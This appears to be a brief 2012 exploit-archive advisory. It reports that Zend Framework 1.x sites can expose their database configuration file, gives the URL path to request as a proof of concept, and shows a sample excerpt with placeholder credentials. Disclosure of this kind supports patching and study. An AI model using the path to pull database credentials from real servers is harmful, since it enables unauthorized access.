Zend Framework suffers from a SQL configuration file disclosure vulnerability.
b7069056345ee5330e0a3c0e501637556f1ac61561d4d6663e9708976cc93556
[+] Vulnerability: Zend Framework SQL Configuration-File disclosure
[-]
[+] Author: W4n73d openforce[at]live[dot]com
[-]
[-]
[+] Vendor: framework.zend.com
[+] Version: 1.x.x
[-]
[-]
[+] PoC: www.whatever.br/application/configs/application.ini
[-]
[+] EX:
//
params.username = "root"
params.password = "myleetpass"
//
[-]
[+] Date: 25. Ago. 2012. Brazil.